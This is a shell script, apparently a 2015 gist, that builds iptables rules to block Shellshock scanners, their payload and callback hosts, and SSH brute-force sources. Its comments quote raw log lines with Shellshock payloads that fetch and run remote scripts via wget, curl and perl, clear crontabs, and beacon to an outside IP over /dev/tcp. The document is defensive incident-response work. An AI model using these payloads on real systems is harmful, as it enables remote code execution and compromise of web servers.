Last active
August 29, 2015 14:16
iptables block list 2015-03-08
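# iptables block list built from web-server and SSH log entries.
#
# Layout: every Shellshock entry keeps the access-log line as evidence, then
# drops inbound traffic from the scanning source and, where the injected
# command named a download or callback IP, drops outbound traffic to it too.
#
# Review notes:
#   - Every logged request below was answered with 301 or 400. That suggests
#     none of them reached a CGI handler, but confirm against the server
#     config rather than relying on it.
#   - Address blocks are containment only. The durable fix is a patched bash
#     and no bash-backed CGI reachable from the network.
#   - These are point-in-time indicators. Re-check them before reuse, since
#     addresses get reassigned and the /24 entries also block their neighbours.

# Drop inbound traffic from source $1 (single address or CIDR).
# The rule is inserted at the top of INPUT so it is evaluated before any
# existing ACCEPT rule. The -C check makes a re-run a no-op instead of
# stacking a duplicate rule each time this file is applied.
block_in() {
  # -C exits non-zero and prints an error when the rule is absent; that is
  # the expected case, so the message is discarded. Genuine failures (not
  # root, missing module) still surface from the -I that follows.
  iptables -C INPUT -s "$1" -j DROP 2>/dev/null ||
    iptables -I INPUT -s "$1" -j DROP
}

# Drop outbound traffic to destination $1 so that a payload fetch or
# callback to that host fails even if an injected command does run.
# The rule is appended, so it only takes effect when no earlier OUTPUT rule
# already accepts the traffic.
block_out() {
  iptables -C OUTPUT -d "$1" -j DROP 2>/dev/null ||
    iptables -A OUTPUT -d "$1" -j DROP
}

# shellshock exploit
# 209.236.133.201 - - [02/Mar/2015:15:50:03 +0700] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22cd /var/tmp ; wget http://151.236.44.210/ft.exe ; curl -O http://151.236.44.210/ft.exe;perl ft.exe;perl /var/tmp/ft.exe;perl ft.exe\x22"
block_in 209.236.133.201
block_out 151.236.44.210
# 31.184.194.114 - - [04/Mar/2015:10:29:53 +0700] "GET /fcgi-php/php HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\x22);'"
block_in 31.184.194.114
block_out 64.32.12.152
# 50.22.0.250 - - [25/Feb/2015:21:45:24 +0000] "GET HTTP/1.1 HTTP/1.1" 400 418 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://87.106.130.7/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://87.106.130.7/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
block_in 50.22.0.250
block_out 87.106.130.7
# 68.116.30.102 - - [27/Feb/2015:08:11:45 +0700] "GET /cgi-bin/test-cgi HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22" "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22"
block_in 68.116.30.102
block_out 23.227.199.185
# 186.211.96.170 - - [23/Feb/2015:22:25:23 +0700] "GET / HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22"
# 216.245.134.238 - - [26/Feb/2015:18:33:15 +0700] "GET / HTTP/1.0" 301 101 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22"
# NOTE(review): these two requests fetch from a hostname, and the list has no
# egress rule for it. iptables resolves a name only once, when the rule is
# added, so a default-deny OUTPUT policy or an egress proxy covers this case
# better than a per-host rule.
block_in 186.211.96.170
block_in 216.245.134.238

# ssh attacker
# No log evidence is kept for these sources. A static list only covers
# addresses already seen; key-only authentication and automated banning of
# repeated failures cover the ones that are not listed yet.
block_in 14.63.161.216
block_in 49.213.16.131
block_in 49.236.204.180
block_in 54.235.163.229
block_in 58.42.252.116
block_in 58.64.3.29
block_in 58.145.168.162
block_in 61.160.215.102
block_in 61.160.247.14
block_in 62.210.141.204
block_in 64.150.187.95
block_in 65.207.23.201
block_in 82.165.151.97
block_in 82.194.76.182
block_in 87.106.151.126
block_in 88.156.77.176
block_in 91.240.163.39
block_in 95.70.201.28
block_in 95.77.16.45
block_in 103.41.124.0/24
block_in 104.130.166.23
block_in 104.167.104.147
block_in 104.207.144.209
block_in 107.182.140.36
block_in 108.229.25.10
block_in 109.166.212.230
block_in 109.169.74.58
block_in 111.74.239.39
block_in 112.217.177.82
block_in 112.220.204.42
block_in 113.195.145.0/24
block_in 115.230.126.151
block_in 115.231.218.130
block_in 115.231.218.131
block_in 115.231.222.45
block_in 115.231.222.176
block_in 115.239.228.0/24
block_in 121.61.19.0/24
block_in 151.249.136.71
block_in 173.193.162.83
block_in 182.100.67.113
block_in 182.100.67.115
block_in 183.136.216.0/24
block_in 198.12.149.20
block_in 198.199.70.171
block_in 200.29.21.26
block_in 200.106.151.126
block_in 200.222.72.170
block_in 202.121.199.171
block_in 202.123.179.226
block_in 218.28.103.231
block_in 218.87.111.108
block_in 218.87.111.110
block_in 218.106.254.121
block_in 221.203.3.0/24
block_in 221.224.10.50
block_in 221.226.106.188
block_in 222.101.130.145
block_in 222.186.50.164
block_in 222.186.56.40
block_in 222.186.56.41
block_in 222.186.58.70
block_in 222.186.197.76

# Persist the running ruleset so the blocks survive a reboot.
# NOTE(review): newer Debian/Ubuntu releases ship this service as
# netfilter-persistent; confirm which name the target host uses.
service iptables-persistent save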